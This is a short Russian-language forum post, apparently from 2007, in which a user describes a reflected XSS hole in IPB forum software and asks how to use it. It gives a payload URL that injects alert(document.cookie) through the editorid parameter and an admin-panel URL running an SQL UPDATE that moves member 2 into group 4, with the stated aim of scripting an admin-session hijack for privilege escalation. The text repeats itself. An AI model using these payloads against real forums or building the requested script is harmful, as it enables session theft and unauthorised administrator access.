FaR-G9
21.08.2007, 23:57
У меня такой вот вопрос
на форуме IPB есть пасивная хсс
http://localhost/ipb/jscripts/folder_rte_files/module_image.php?editorid=";alert(document.cookie);var i="
Какаим образом можно использовать эту уязвимость, чтоб задействовать куки в php скрипте
В общем я хочу скриптом сгенерировать такую ссылку
http://localhost/ipb/admin/index.php?adsess=сесия&act=sql&code=runsql§ion=admin&query=UPDATE+ibf_members+SET+mgroup+%3D+%274%27+WH ERE+id+%3D+%272%27&st="
на форуме IPB есть пасивная хсс
http://localhost/ipb/jscripts/folder_rte_files/module_image.php?editorid=";alert(document.cookie);var i="
Какаим образом можно использовать эту уязвимость, чтоб задействовать куки в php скрипте
В общем я хочу скриптом сгенерировать такую ссылку
http://localhost/ipb/admin/index.php?adsess=сесия&act=sql&code=runsql§ion=admin&query=UPDATE+ibf_members+SET+mgroup+%3D+%274%27+WH ERE+id+%3D+%272%27&st="